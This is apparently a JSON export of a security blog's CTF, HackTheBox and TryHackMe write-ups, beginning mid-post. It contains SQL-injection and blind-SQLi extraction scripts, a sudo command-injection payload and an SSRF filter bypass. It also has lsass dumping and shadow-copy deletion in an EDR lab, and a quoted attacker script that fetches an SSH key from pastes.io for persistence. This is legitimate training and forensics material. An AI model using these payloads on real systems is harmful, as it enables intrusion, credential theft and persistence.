Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds A cms is running in port 80 , craft cms\nIt is vulnerable to rce CVE-2023-41892\nThere are 2 :\nmatthew zoneminder Further enumartion we get a backup file surveillance\u0026ndash;2023-10-17-202801\u0026ndash;v4.4.14.sql.zip. It has a sql backup of the database , here we get creds for the user matthew.\nuser.txt 260ecc03cedb8e78d80a6658b5b22eac\nWe also get the creda for zoneminder in the ZoneMinder config files password : ZoneMinderPassword2023\nZoneminder is a service running on port 8080, So we tunnel using ssh to access it.\nIt is vulnerable to rce CVE-2023-26035\nTo escalate priviledges and read root flag\n1 sudo /usr/bin/zmupdate.pl -v 1.19.0 -u \u0026#34;;cat /root/root.txt;\u0026#34; root.txt 13630834b0c9c6f122557097788d8e25\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_surveillance/","title":"Htb_surveillance"},{"content":"SOC Lab Setup Introduction This is my documentation of a lab setup for a SOC (Security operation center) environment. I decided to pursue this project with the aim of learning about endpoint detection and response. SOC analysis is more about blue teaming and detecting threats in an environment.\nAs is did this i followed steps from this blog post \u0026raquo; here . 
Credits!!\nSummary Setup Intrusion Blocking attacks Tuning False Positives Setup Setup of vms(ubuntu server and windows) NOTE: im using a computer with the following specs:\n8gb RAM intel i5 500gb hard disk You might want to allocate different amount of resources for your vms depending on the specs of your hardware. As for me my specs constrained me , my vms were slow esp the windows vm. I allocated 2gb for the windows vm and 1gb for the ubuntu server.\nInstalling of limacharlie sensor LimaCharlie is a very powerful “SecOps Cloud Platform” . Check it out \u0026raquo; here\nC2 (command and control) For the C2 i used sliver-server by bishop fox\n1 Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing I created a C2 payload and dropped it in the windows vm.\nUsing the implant we can access the windows vm from the ubuntu server attack machine.\nBelow is a list of running processes\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 . 
├── [0] [System Process] │ └── [4] System │ ├── [1444] Memory Compression │ ├── [72] Registry │ └── [528] smss.exe ├── [632] csrss.exe ├── [732] csrss.exe ├── [776] wininit.exe │ ├── [864] services.exe │ │ ├── [2160] Sysmon64.exe │ │ ├── [3708] svchost.exe │ │ ├── [1348] svchost.exe │ │ ├── [1508] svchost.exe │ │ ├── [1668] svchost.exe │ │ │ └── [5768] audiodg.exe │ │ ├── [2152] vm3dservice.exe │ │ │ └── [2284] vm3dservice.exe │ │ ├── [1128] svchost.exe │ │ │ ├── [648] taskhostw.exe │ │ │ ├── [1960] sihost.exe │ │ │ ├── [2436] CompatTelRunner.exe │ │ │ │ ├── [2488] conhost.exe │ │ │ │ └── [1236] CompatTelRunner.exe │ │ │ ├── [2520] MicrosoftEdgeUpdate.exe │ │ │ └── [3460] taskhostw.exe │ │ ├── [2124] vmtoolsd.exe │ │ ├── [4368] svchost.exe │ │ ├── [3500] SecurityHealthService.exe │ │ ├── [6548] svchost.exe │ │ ├── [1636] svchost.exe │ │ ├── [1772] svchost.exe │ │ ├── [1788] svchost.exe │ │ ├── [3100] SgrmBroker.exe │ │ ├── [1304] svchost.exe │ │ ├── [2168] VGAuthService.exe │ │ ├── [2132] rphcp.exe │ │ ├── [628] svchost.exe │ │ ├── [896] spoolsv.exe │ │ ├── [992] svchost.exe │ │ │ ├── [1284] ShellExperienceHost.exe │ │ │ ├── [1580] RuntimeBroker.exe │ │ │ ├── [3240] BackgroundTransferHost.exe │ │ │ ├── [4376] backgroundTaskHost.exe │ │ │ ├── [5572] RuntimeBroker.exe │ │ │ ├── [740] unsecapp.exe │ │ │ ├── [1156] dllhost.exe │ │ │ ├── [5608] SearchApp.exe │ │ │ ├── [6004] RuntimeBroker.exe │ │ │ ├── [4352] RuntimeBroker.exe │ │ │ ├── [2476] WmiPrvSE.exe │ │ │ ├── [3680] WmiPrvSE.exe │ │ │ ├── [3892] TextInputHost.exe │ │ │ ├── [3932] StartMenuExperienceHost.exe │ │ │ ├── [4488] MoUsoCoreWorker.exe │ │ │ ├── [1256] RuntimeBroker.exe │ │ │ ├── [3552] smartscreen.exe │ │ │ ├── [5064] SearchApp.exe │ │ │ └── [1216] TiWorker.exe │ │ ├── [2984] dllhost.exe │ │ ├── [2092] TrustedInstaller.exe │ │ ├── [2376] svchost.exe │ │ ├── [3912] SearchIndexer.exe │ │ ├── [5652] svchost.exe │ │ ├── [1172] svchost.exe │ │ │ ├── [3152] ctfmon.exe │ │ │ └── [4800] CompatTelRunner.exe │ │ │ 
└── [2944] conhost.exe │ │ ├── [1520] svchost.exe │ │ ├── [1532] svchost.exe │ │ ├── [1832] msdtc.exe │ │ ├── [736] svchost.exe │ │ ├── [4852] sppsvc.exe │ │ ├── [5172] svchost.exe │ │ ├── [1292] svchost.exe │ │ ├── [1628] svchost.exe │ │ ├── [1640] svchost.exe │ │ └── [2120] svchost.exe │ ├── [876] lsass.exe │ └── [1016] fontdrvhost.exe ├── [784] winlogon.exe │ ├── [1008] fontdrvhost.exe │ └── [1040] dwm.exe ├── [3328] explorer.exe │ ├── [3512] SecurityHealthSystray.exe │ ├── [3880] vmtoolsd.exe │ ├── [4272] OneDrive.exe │ └── [6984] cmd.exe │ ├── [1696] CONTINUED_CARRY.exe │ └── [3612] conhost.exe ├── [6808] setup.exe │ ├── [7032] setup.exe │ └── [3008] MicrosoftEdgeUpdate.exe └── [6952] Microsoft.SharePoint.exe ⚠️ Security Product(s): Sysmon64, Windows Smart Screen Inturn we can observe the malware in the limacharlie telementery. We can detect our maliciuos process apart from the the legitimate processes. we can also view it network connections.\nIntrusion I can steal creds by dumping lsass.exe from the windows box memory to my attack machine\nThis will generate telementery in limacharkie that we can search with \u0026ldquo;SENSITIVE_PROCESS_ACCESS\u0026rdquo;\nWe can create an edr rule to alert once this type of activity occurs\n1 2 3 4 event: SENSITIVE_PROCESS_ACCESS op: ends with path: event/*/TARGET/FILE_PATH value: lsass.exe This rule will detect \u0026ldquo;SENSITIVE_PROCEE_ACCESS\u0026rdquo; with process being \u0026ldquo;lsass.exe\u0026rdquo;\nTo respond we use:\n1 2 - action: report name: LSASS access This will generate a detection report that we can view in the detections menu.\nBlocking attacks Here we are going to craft rules to take action when detections are made\nin thbis i ran thsi command :\n1 vssadmin delete shadows /all Which will delete volume shadow copies. 
This is just an example of a process that may indicate suspicious activity on a system\nThen we craft an Response rule:\nThis rule will terminate the parent process when it is detected.\n1 2 3 4 5 6 - action: report name: vss_deletion_kill_it - action: task command: - deny_tree - \u0026lt;\u0026lt;routing/parent\u0026gt;\u0026gt; This hung shell is an indication that it worked succesfully\nTuning False Positives Here we craft a false positive detection rule. This is whereby we can prevent alerts when normal system processes are run, thus causing alot of noise.\nI crafted to detect when whoami.exe is run. This is just an example.\n1 2 3 4 5 6 7 8 9 10 11 op: and rules: - op : is path: cat value: Whoami Utility Execution - op: is path: detect/event/FILE_PATH value: C:\\Windows\\system32\\whoami.exe - op: is path: detect/event/COMMAND_LINE value: \u0026#39;\u0026#34;C:\\Windows\\system32\\whoami.exe\u0026#34;\u0026#39; After testing it:\nIt works!!\nIf i run whoami when the rule is enabled i get no alaert, however whn i disable it i get an alert.\nAutomated Yara Scanning 1 2 YARA is a tool primarily used for identifying and classifying malware based on textual or binary patterns. It allows researchers and security professionals to craft rules that describe unique characteristics of specific malware families or malicious behaviors. There are well crafted rules for sliver (our c2 server) on the internet. 
We will use this \u0026raquo; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 ule sliver_github_file_paths_function_names { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver Windows and Linux implants based on paths and function names within the binary\u0026#34; strings: $p1 = \u0026#34;/sliver/\u0026#34; $p2 = \u0026#34;sliverpb.\u0026#34; $fn1 = \u0026#34;RevToSelfReq\u0026#34; $fn2 = \u0026#34;ScreenshotReq\u0026#34; $fn3 = \u0026#34;IfconfigReq\u0026#34; $fn4 = \u0026#34;SideloadReq\u0026#34; $fn5 = \u0026#34;InvokeMigrateReq\u0026#34; $fn6 = \u0026#34;KillSessionReq\u0026#34; $fn7 = \u0026#34;ImpersonateReq\u0026#34; $fn8 = \u0026#34;NamedPipesReq\u0026#34; condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and (all of ($p*) or 3 of ($fn*)) } rule sliver_proxy_isNotFound_retn_cmp_uniq { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on some unique CMPs within the Proxy isNotFound function. False positives may occur\u0026#34; strings: $ = {C644241800C381F9B3B5E9B2} $ = {8B481081F90CAED682} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } rule sliver_nextCCServer_calcs { meta: author = \u0026#34;NCSC UK\u0026#34; description = \u0026#34;Detects Sliver implant framework based on instructions from the nextCCServer function. 
False positives may occur\u0026#34; strings: $ = {4889D3489948F7F94839CA????48C1E204488B0413488B4C1308} condition: (uint32(0) == 0x464C457F or (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)) and all of them } We will also need a rule to detect when yara is matched.\n1 2 3 4 5 6 7 8 event: YARA_DETECTION op: and rules: - not: true op: exists path: event/PROCESS/* - op: exists path: event/RULE_NAME From here we can create rules to automatically scan new executables and those in the downloads directory.\nWith this we can uleash the full power of the EDR to scan and detect malicious processes and files\nUntil next time!! HACK THE PLANET\n","date":"2024-02-06T15:57:25+03:00","image":"https://f0rk3b0mb.github.io/cover/soc_lab.jpg","permalink":"https://f0rk3b0mb.github.io/p/soc_analyst_lab/","title":"Soc_analyst_lab"},{"content":"Writeup for challenges in knightctf 2024\nweb kitty Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.\nN:B: There is no need to do bruteforce.\nHere its obvious that it is sqli , login bypas to be precise\n1 payload: \u0026#34; or 1=1-- - since it was in json we you had to excape the first double-quote\nREADME This challenge entailed bypass a 403 response to be able to read the flag. The methos to exploit this is by using special http headers. see here\nUsing burp intruder , we get the flag\nGain access 1 For this challenge we are given a login page. It obvious the vuln is login bypass.\nInspecting the page source code we can see a comment with the root email \u0026ldquo;root@knightctf.com\u0026rdquo;\n1 payload : root@knightctf.com\u0026#39;-- - Gain access 2 For this challnege we are also given a login page. Viewing the page source we can see a comment that indicated there is a path notesssssss.txt. Visiting it\u0026hellip;\n1 2 I\u0026#39;ve something for you. Think..... root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d The hash is md5 since it has a length of 32. 
Using this \u0026raquo; site we find the password as \u0026ldquo;letmein_kctf2024\u0026rdquo;\nLogging in we get a OTP verification page. It is vulnerable to sqli\n1 payload : anything\u0026#39; or 1=1-- - We then get access to the dashboard\nI got stuck here , will update when the ctf ends. :)\nUpdate:\nAfter you get the password , there is ana OTP page . The page also has an option to resend otp which requires you to enter an email. If we eneter the email roor@knightctf.com. That we had earlier we can see that it accepts it. Note: I had tries this methos earlier but i used the wrong format.\nSo you can send several email as an array []\n1 2 3 4 { \u0026#34;email\u0026#34;: [\u0026#34;root@knightctf.com\u0026#34;,\u0026#34;attacker@email.com\u0026#34;] } This will send the OTP code to both emails. Using the OTP code we get the flag\nCREDIT: @T3l3sc0p3\nNetworking For the networking challs check out my teammates writeups on them \u0026raquo;\nhere ","date":"2024-01-20T22:14:59+03:00","image":"https://f0rk3b0mb.github.io/cover/knightctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/knightctf_2024/","title":"Knightctf_2024"},{"content":"Whats my password solve script category : web difficulty: easy\nVulnerability is error based blind sqli\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import requests import string import json url=\u0026#34;http://whats-my-password-web.chal.irisc.tf/api/login\u0026#34; #found_char=[\u0026#39;i\u0026#39;, \u0026#39;r\u0026#39;, \u0026#39;i\u0026#39;, \u0026#39;s\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;t\u0026#39;, \u0026#39;f\u0026#39;, \u0026#39;{\u0026#39;, \u0026#39;m\u0026#39;, \u0026#39;y\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;2\u0026#39;,\u0026#39;W\u0026#39;, \u0026#39;0\u0026#39;, \u0026#39;R\u0026#39;, \u0026#39;D\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;_\u0026#39;, 
\u0026#39;S\u0026#39;, \u0026#39;Q\u0026#39;, \u0026#39;l\u0026#39;, \u0026#39;1\u0026#39;,\u0026#39;}\u0026#39;] found_char=[] headers={\u0026#34;Content-Type\u0026#34;:\u0026#34;application/json\u0026#34;} def main(): for x in range(len(found_char),50): for i in string.printable[:-6]: username = \u0026#34;skat\u0026#34; password = f\u0026#34;\\\u0026#34; or 1=(IF(SUBSTR((SELECT password from users where username=\u0026#39;skat\u0026#39;),{x},1)=\u0026#39;{i}\u0026#39;, 1,2))-- -\u0026#34; data = {\u0026#34;username\u0026#34;: username, \u0026#34;password\u0026#34;: password} sdata=json.dumps(data) r=requests.post(url,data=sdata,headers=headers) if \u0026#34;root\u0026#34; in r.text: found_char.append(i) print(found_char) break main() flag: irisctf{my_p422W0RD_1S_SQl1} ","date":"2024-01-06T18:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/iris.png","permalink":"https://f0rk3b0mb.github.io/p/irisctf_whats_my_password/","title":"Irisctf_whats_my_password"},{"content":"Writeup of htb sherlock Meerkat rating: easy\nWe believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running? we can filter the meerkat-alerts.json with\u0026hellip;\n1 2 3 4 cat meerkat-alerts.json |jq |grep signature | grep -v python the bmp name is in the signature ans: Bonitasoft\nWe believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out? From the meerkat-alerts.json and from pacap file we can see that there was alot of alerts on python-requests and we can see the requests tested different creds. This is possible Credential Stuffing\nans: Credential Stuffing\nDoes the vulnerability exploited have a CVE assigned - and if so, which one? Here use the same command as question1 , the cve is in the signature\nans: CVE-2022-25237\nWhich string was appended to the API URL path to bypass the authorization filter by the attacker\u0026rsquo;s exploit? 
in this case i used tshark to analyse the pcap.\n1 2 3 4 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri | grep -i api filter post requests , get the url path and grep for the api endpoints i18ntranslation\nHow many combinations of usernames and passwords were used in the credential stuffing attack? here we filter post requests, the we remove \u0026ldquo;username=install\u0026amp;password=install\u0026amp;_l=en\u0026rdquo; , i also removed \u0026ldquo;/bonita/API/portal/page/;i18ntranslation\u0026rdquo; and \u0026ldquo;/bonita/API/pageUpload;i18ntranslation?action=add\u0026rdquo; which were not login requests then pipe the output to uniq\n1 2 tshark -r meerkat.pcap -Y \u0026#34;http.request.method == POST\u0026#34; -T fields -e http.request.uri -e http.file_data | grep -v \u0026#34;username=install\u0026amp;password=install\u0026amp;_l=en\u0026#34; | grep -v \u0026#34;/bonita/API/portal/page/;i18ntranslation\u0026#34; | grep -v \u0026#34;/bonita/API/pageUpload;i18ntranslation?action=add\u0026#34; | uniq | wc -l ans: 56\nWhich username and password combination was successful? From the query above without uniq , the last combination has a different http.file_data , yoll have to check through wireshark but the ans is \u0026hellip;\nans: seb.broom@forela.co.uk:g0vernm3nt\nIf any, which text sharing site did the attacker utilise? As i was analysing the pcap using this query we can get the full uri. the url is part of parameters\n1 tshark -r meerkat.pcap -T fields -e http.request.full_uri | uniq ans: pastes.io\nPlease provide the filename of the public key used by the attacker to gain persistence on our host. 
Visiting the url we get a bash script with the following content\u0026hellip; hxxps[://]pastes[.]io/raw/bx5gcr0et8\n1 2 3 #!/bin/bash curl https://pastes.io/raw/hffgra4unv \u0026gt;\u0026gt; /home/ubuntu/.ssh/authorized_keys sudo service ssh restart ans: hffgra4unv\nCan you confirmed the file modified by the attacker to gain persistence? see above\nans: /home/ubuntu/.ssh/authorized_keys\nCan you confirm the MITRE technique ID of this type of persistence mechanism? this technique of using ssh authorized keys has id T1098.004. You can get this by visiting mitre website or googling or use chatgpt idc.\nans: T1098.004\n","date":"2023-12-20T14:43:14+03:00","permalink":"https://f0rk3b0mb.github.io/p/htb-sherlock-meerkat/","title":"Htb Sherlock Meerkat"},{"content":"Thm Investigating with splunk This room is for pactice on the Jnuior Penetration tester path on TryHackMe \u0026raquo;\u0026gt; here\nHow many events were collected and Ingested in the index main? 1 2 3 index=\u0026#34;main\u0026#34; ans: 12256 On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username? 1 2 3 index=main EventID=\u0026#34;4720\u0026#34; ans: A1berto On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key? 1 2 3 4 index=main Hostname=\u0026#34;Micheal.Beaven\u0026#34; EventID=\u0026#34;12\u0026#34; A1berto ans : HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\A1berto Examine the logs and identify the user that the adversary was trying to impersonate. 1 2 3 4 5 6 7 The attacker account is called A1berto the real account is Alberto with an \u0026#39;L\u0026#39; index=main (User section) ans : Alberto What is the command used to add a backdoor user from a remote computer? 
1 2 3 4 index=main EventID=\u0026#34;4688\u0026#34; ans: \u0026#34;C:\\windows\\System32\\Wbem\\WMIC.exe\u0026#34; /node:WORKSTATION6 process call create \u0026#34;net user /add A1berto paw0rd1\u0026#34; How many times was the login attempt from the backdoor user observed during the investigation? 1 2 3 4 5 6 index=main EventID=\u0026#34;4624\u0026#34; \u0026lt;\u0026lt; succesful logon\u0026gt;\u0026gt; index=main EventID=\u0026#34;4625\u0026#34; \u0026lt;\u0026lt;unsuccesful logon\u0026gt;\u0026gt; both return no results ans : 0 What is the name of the infected host on which suspicious Powershell commands were executed? 1 2 3 index=main powershell ans : James.browne PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution? 1 2 3 index=main EventID=\u0026#34;4103\u0026#34; ans: 79 An encoded Powershell script from the infected host initiated a web request. What is the full URL? 1 2 3 4 5 6 from question 7 check the first event base64 decode and use decode text utf-16le using cyberchef. The url is base64 encoded . Youll also have to defang the url ans: hxxp[://]10[.]10[.]10[.]5/news[.]php ","date":"2023-12-03T11:56:27+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_splunk/","title":"Thm_splunk"},{"content":"Wazuh This is a writeup of Wazuh module on tryhackme. This is in the SOC Level 1 path. \u0026raquo; here ENjoy :)\nWazuh is an opensource XDR and SIEM service\nIntro 1 2 3 4 5 6 7 8 9 10 11 12 13 1. When was Wazuh released? 2015 2. What is the term that Wazuh calls a device that is being monitored for suspicious activity and potential security threats? agent 3. Lastly, what is the term for a device that is responsible for managing these devices? manager Wazuh agents 1 2 3 4 5 6 7 8 9 1. How many agents does this Wazuh management server manage? 2 2. What are the status of the agents managed by this Wazuh management server? 
disconnected Wazuh Vulnerability Assessment \u0026amp; Security Events 1 2 3 4 1. How many \u0026#34;Security Event\u0026#34; alerts have been generated by the agent \u0026#34;AGENT-001\u0026#34;? 196 Collecting Windows Logs with Wazuh 1 2 3 4 5 6 7 8 9 1. What is the name of the tool that we can use to monitor system events? sysmon 2. What standard application on Windows do these system events get recorded to? event viewer Collecting Linux Logs with Wazuh 1 2 3 4 1. What is the full file path to the rules located on a Wazuh management server? /var/ossec/ruleset/rules Auditing Commands on Linux with Wazuh 1 2 3 4 5 6 7 8 9 1. What application do we use on Linux to monitor events such as command execution? auditd 2. What is the full path \u0026amp; filename for where the aforementioned application stores rules? /etc/audit/ruled.d/audit.rules Wazuh API 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 1. What is the name of the standard Linux tool that we can use to make requests to the Wazuh management server? curl 2. What HTTP method would we use to retrieve information for a Wazuh management server API? GET 3. What HTTP method would we use to perform an action on a Wazuh management server API? PUT 4. Use the API console to find the Wazuh server\u0026#39;s version. v4.2.5 Generating Reports with Wazuh 1 2 3 4 1. Analyse the report. What is the name of the agent that has generated the most alerts? 
agent-001 ","date":"2023-11-25T08:48:38+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_wazuh/","title":"Thm_wazuh"},{"content":"Hackthebox - Hack the boo 2023 writeup HauntMart Category: web Rating: Easy\nThis challenge had a downloadable part , it was a web applicatio that allowed a user to register and login and add a product.\nTo get the flag we have to login as admin.\nThe is a /addAdmin route but it only accepts requests from localhost\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 @api.route(\u0026#39;/addAdmin\u0026#39;, methods=[\u0026#39;GET\u0026#39;]) @isFromLocalhost def addAdmin(): username = request.args.get(\u0026#39;username\u0026#39;) if not username: return response(\u0026#39;Invalid username\u0026#39;), 400 result = makeUserAdmin(username) if result: return response(\u0026#39;User updated!\u0026#39;) return response(\u0026#39;Invalid username\u0026#39;), 400 I Tries using X-Forwarded-For headers but it didnt work.\nIf you look closer at the code there is a function to send a request to fetch the manual from a url.\nThis vulnerability is called ssrf (server side request forgery) check more \u0026raquo;\u0026gt; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 def downloadManual(url): safeUrl = isSafeUrl(url) if safeUrl: try: local_filename = url.split(\u0026#34;/\u0026#34;)[-1] r = requests.get(url) with open(f\u0026#34;/opt/manualFiles/{local_filename}\u0026#34;, \u0026#34;wb\u0026#34;) as f: for chunk in r.iter_content(chunk_size=1024): if chunk: f.write(chunk) return True except: return False return False There is also a poor attempt of a filter for the url\n1 2 3 4 5 6 7 8 9 blocked_host = [\u0026#34;127.0.0.1\u0026#34;, \u0026#34;localhost\u0026#34;, \u0026#34;0.0.0.0\u0026#34;] def isSafeUrl(url): for hosts in blocked_host: if hosts in url: return False return True We can easily bypass this , there are many routed to localhost other that the ones listed there. 
You can check them out \u0026raquo;\u0026gt; here\nFor me this one worked:\nNOTE: you can get the port that the app is listenig from in therun.py , we have to make a request to /api/addAdmin to make our user admin\n1 2 http://127.0.1.3:1337/api/addAdmin?username=test We get the flag as : HTB{A11_55RF_5C4rY_p4tch_3m_411!}\n","date":"2023-10-27T08:52:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/hack_the_boo2023/","title":"Hack_the_boo2023"},{"content":"Thm owasp Command Injection Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 What strange text file is in the website root directory? cmd: ls drpepper.txt How many non-root/non-service/non-daemon users are there? What user is this app running as? cmd: whoami www-data What is the user\u0026#39;s shell set as? What version of Ubuntu is running? cmd: lsb_release -a 18.04.4 Print out the MOTD. What favorite beverage is shown? cmd: cat /etc/update-motd.d/00-header DR PEPPER Broken Authentication Practical 1 2 3 4 5 6 7 8 9 10 11 12 What is the flag that you found in darren\u0026#39;s account? fe86079416a21a3c99937fea8874b667 What is the flag that you found in arthur\u0026#39;s account? d9ac0f7db4fda460ac3edeb75d75e16e Sensitive Data Exposure 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 What is the name of the mentioned directory? /assets Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? webapp.db Use the supporting material to access the sensitive data. What is the password hash of the admin user? 6eea9b7ef19179a06954edd0f6c05ceb Crack the hash. What is the admin\u0026#39;s plaintext password? qwertyuiop Login as the admin. What is the flag? 
THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl} XML External Entity 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 What is the name of the user in /etc/passwd falcon Where is falcon\u0026#39;s SSH key located? /home/falcon/.ssh/id_rsa What are the first 18 characters for falcon\u0026#39;s private key MIIEogIBAAKCAQEA7b Broken Access Control (IDOR Challenge) 1 2 3 4 5 6 7 8 9 10 Look at other users notes. What is the flag? payload : http://10.10.145.127/note.php?note=0 flag{fivefourthree} Security Misconfiguration 1 2 3 4 5 6 7 8 Hack into the webapp, and find the flag! creds: pensive:PensiveNotes thm{4b9513968fd564a87b28aa1f9d672e17} XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 Navigate to http://10.10.98.36/ in your browser and click on the \u0026#34;Reflected XSS\u0026#34; tab on the navbar; craft a reflected XSS payload that will cause a popup saying \u0026#34;Hello\u0026#34;. ThereIsMoreToXSSThanYouThink On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. ReflectiveXss4TheWin Then add a comment and see if you can insert some of your own HTML. HTML_T4gs On the same page, create an alert popup box appear on the page with your document cookies. W3LL_D0N3_LVL2 Change \u0026#34;XSS Playground\u0026#34; to \u0026#34;I am a hacker\u0026#34; by adding a comment and using Javascript. websites_can_be_easily_defaced_with_xss Insecure Deserialization 1 2 3 4 5 6 7 8 9 10 Who developed the Tomcat application? The Apache Software Foundation What type of attack that crashes services can be performed with insecure deserialization? 
denial of service Insecure Desirialization 1 2 3 4 5 6 7 8 9 10 11 1st flag (cookie value) THM{good_old_base64_huh} 2nd flag (admin dashboard) THM{heres_the_admin_flag} Insecure Deserialization - Code Execution 1 2 3 4 5 6 flag.txt 4a69a7ff9fd68 Components with know vulns 1 2 3 4 5 6 7 How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) exploit : https://www.exploit-db.com/exploits/47887 1611 Insufficient Logging and Monitoring 1 2 3 4 5 6 7 8 9 10 What IP address is the attacker using? 49.99.13.16 What kind of attack is being carried out? brute force ","date":"2023-10-25T13:12:22+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_owasp/","title":"Thm_owasp"},{"content":"Blackhat Mea 2023 ctf writeup We participated this ctf as Chasing X fr334aks X L3v3l 6 and managed to get pos 178. It wasn\u0026rsquo;t easy. I Managed to solve the web challenge below.\nAuthy For this challenge we are provided with an api endpoint and challenge source\nAccording to the LoginController.go file we can create a user and login , the user password length should not be less than 6\nThe vulnerability occurs when the user passowrd value in the registration function is not the one being compared in the login function. 
To get the flag we have to login with a password of length \u0026lt; 6.\nThe vulnerable code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 //registration if len(user.Password) \u0026lt; 6 { log.Error(\u0026#34;Password too short\u0026#34;) resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, \u0026#34;Password too short\u0026#34;, \u0026#34;EXT_REF\u0026#34;)) return resp } //login if len(password) \u0026lt; 6 { flag := os.Getenv(\u0026#34;FLAG\u0026#34;) res := \u0026amp;Flag{ Flag: flag, } resp := c.JSON(http.StatusOK, res) log.Info() return resp } With my vast ctf experience i could tell what i needed to do :)\nTHe logic is :\n1 2 3 4 5 user.Name := \u0026#34;😃\u0026#34; // Contains 1 emoji character lengthOfString := len(user.Name) // Length of the string (bytes) - 4 (UTF-8 encoding) lengthOfRuneSlice := len([]rune(user.Name)) // Length of rune slice (code points) - 1 So i sent the request for registration with the password as two smileys and login with the same password. 
In the backend the register will see a length of 8 and login will see a length of 2 thus solving the challenge\n1 2 3 4 5 curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;, \u0026#34;Firstname\u0026#34;: \u0026#34;John\u0026#34;, \u0026#34;Lastname\u0026#34;: \u0026#34;Doe\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/login The ctf was great and see you in the next one\n","date":"2023-10-09T16:06:15+03:00","image":"https://f0rk3b0mb.github.io/cover/bh.png","permalink":"https://f0rk3b0mb.github.io/p/blackhat_mea_2023/","title":"Blackhat_mea_2023"},{"content":"Shehacks intervasity ctf 2023 This ctf onsite at usiu , nairobi . I particpated online.\nweb category\nGraph1 This was an easy chalenge that tested knowledge in graphql queries\nthe graphql endpoint was located at /graphql.\nfor more info on how to enumerate graphql \u0026raquo; here\nSo basicaly if we send the query below we get introspection on the grapql endpoint\n1 {__schema{types{name,fields{name}}}} You can then use \u0026raquo; here to visualize the schema\nremember to set the content-type to \u0026ldquo;appication/graphql\u0026rdquo; when sending the request\nFrom this we find out that there is a field known as getFlag. We can then run the query below to get the flag . 
